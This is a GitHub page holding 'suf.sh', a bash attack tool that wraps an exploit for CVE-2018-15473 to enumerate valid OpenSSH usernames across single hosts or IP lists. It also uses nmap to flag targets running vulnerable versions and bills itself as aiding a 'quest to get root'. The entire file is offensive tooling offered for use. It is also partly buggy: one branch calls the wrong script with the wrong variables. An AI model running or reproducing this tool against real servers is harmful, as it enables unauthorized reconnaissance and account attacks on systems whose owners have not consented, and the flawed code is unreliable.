-
Notifications
You must be signed in to change notification settings - Fork 2
/
suf.sh
192 lines (181 loc) · 4.66 KB
/
suf.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
#!/bin/bash
# Exploits CVE-2018-15473 to enumerate OpenSSH usernames
RED=$( printf '\033[01;31m')
GREEN=$(printf '\033[00;32m')
RESTORE=$(printf '\033[0m')
# CLI mode
# If arguments are provided it goes to CLI mode. Otherwise it continues
# to the interactive menu system.
# Evaluate user or 1st arg
case $# in
2)
user=$1
ip=$2
python sshenum.py $ip $user
exit
;;
3)
if [ $1 == "-u" ]; then
userfile="$2"
ip="$3"
for user in $( cat $userfile )
do
python sshenum.py $ip $user
done
exit
elif [ $2 == "-i" ]; then
user="$1"
ipfile="$3"
for ip in $( cat $ipfile )
do
echo -e "\nTarget: $ip"
python sshenum.py $ip $user
echo ""
done
exit
else
echo "Invalid Options"
sleep 3
exit 1
fi
;;
4)
userfile="$2"
ipfile="$4"
for ip in $( cat $ipfile )
do
echo -e "\nTarget: $ip"
for user in $( cat $userfile )
do
python sshenum.py $ip $user
done
done
exit
;;
*)
esac
# Interactive Menu Mode
echo -e $GREEN"\nSSH User Finder v1.2$RESTORE"
echo -e $GREEN"A tool for aiding you in your quest to get root\n$RESTORE"
sleep 2
echo -e "Choose an option:"
echo "[1] Check for usernames on host"
echo "[2] Check if target is vulnerable to username checking"
read -p "suf => " menu
# Checks if host is vulnerable
if [ $menu == "2" ]; then
echo -e "\nWhat is the IP of the host you want to check?"
read -p "suf => " checkip
scan=$( nmap -sV -Pn -n -p 22 $checkip | egrep -o "OpenSSH [0-9]{1}\.[0-9]{1}" )
if [ -z "$scan" ]; then
echo $RED"Error: Target is not running OpenSSH"$RESTORE
sleep 2
exit
fi
version=$( echo $scan | egrep -o -m 1 "[0-9]{1}\.[0-9]{1}" | tr -d '.' )
if [ "$version" -le 77 ]; then
echo $GREEN"Target is vulnerable to exploit"$RESTORE
sleep 3
exit
elif [ $version > "77" ]; then
echo $RED"Target is not vulnerable to exploit"$RESTORE
sleep 3
exit
else
echo $RED"Unknown error"$RESTORE
sleep 3
fi
fi
# Username Checker
echo -e "\nUse single username or username list for testing?"
echo "[1] Single username"
echo "[2] Username list"
read -p "suf => " useroption
echo -e "\nTest single IP or IPs from a list?"
echo "[1] Single IP"
echo "[2] IP list"
read -p "suf => " ipoption
# Choice is userfile and ipfile
if [ $useroption == "2" ] && [ $ipoption == "2" ]; then
echo "What is the path to the userlist file? (relative or full path)"
read -p "suf => " userfile
echo -e "\nWhat is the path to the IP file? (relative or full path)"
read -p "suf => " ipfile
echo "\nUser list: $userfile"
echo "IP list: $ipfile"
echo -e "\nLook good? (y/n)"
read -p "suf => " confirm
if [ $confirm == "y" ] || [ $confirm == "Y" ]; then
for ip in $( cat $ipfile )
do
echo $RED"Checking hosts for valid users..."$RESTORE
sleep 3
for user in $( cat $userfile )
do
python sshenum.py $ip $user
done
done
else
exit
fi
# Choice is userfile and single ip
elif [ $useroption == "2" ] && [ $ipoption == "1" ]; then
echo "What is the path to the userlist file? (relative or full path)"
read -p "suf => " userfile
echo -e "\nWhat is the IP address of the host to check?"
read -p "suf => " ip
echo "\nUser list: $userfile"
echo "IP: $ip"
echo -e "\nLook good? (y/n)"
read -p "suf => " confirm
if [ $confirm == "y" ] || [ $confirm == "Y" ]; then
echo $GREEN"Checking $ip for valid users..."$RESTORE
sleep 3
for user in $( cat $userfile )
do
python sshenum.py $ip $user
done
else
exit
fi
# Choice is single username and ipfile
elif [ $useroption == "1" ] && [ $ipoption == "2" ]; then
echo "What is the username you would like to check?"
read -p "suf => " username
echo -e "\nWhat is the path to the IP file? (full or relative path)\n"
read -p "suf => " ipfile
echo -e "\nUsername: $username"
echo "IP: $ipfile"
echo -e "\nLook good? (y/n)"
read -p "suf => " confirm
if [ $confirm == "y" ] || [ $confirm == "Y" ]; then
echo $GREEN"Checking hosts for username $username..."$RESTORE
for ip in $( cat $ipfile )
do
python sshenum.sh $ipfile $user
done
else
exit
fi
# Option is single username and single ip
elif [ $useroption == "1" ] && [ $ipoption == "1" ]; then
echo "What is the username you would like to check?"
read -p "suf => " username
echo -e "\nWhat is the IP address of the host to check?"
read -p "suf => " ip
echo "Username: $username"
echo "Host IP: $ip"
echo -e "\nLook good? (y/n)\n"
read -p "suf => " confirm
if [ $confirm == "y" ] || [ $confirm == "Y" ]; then
echo $GREEN"Checking $ip for username $username..."$RESTORE
python sshenum.py $ip $username
else
exit
fi
# Invalid option selected
else
echo $RED"Invalid option(s)"$RESTORE
sleep 5
exit
fi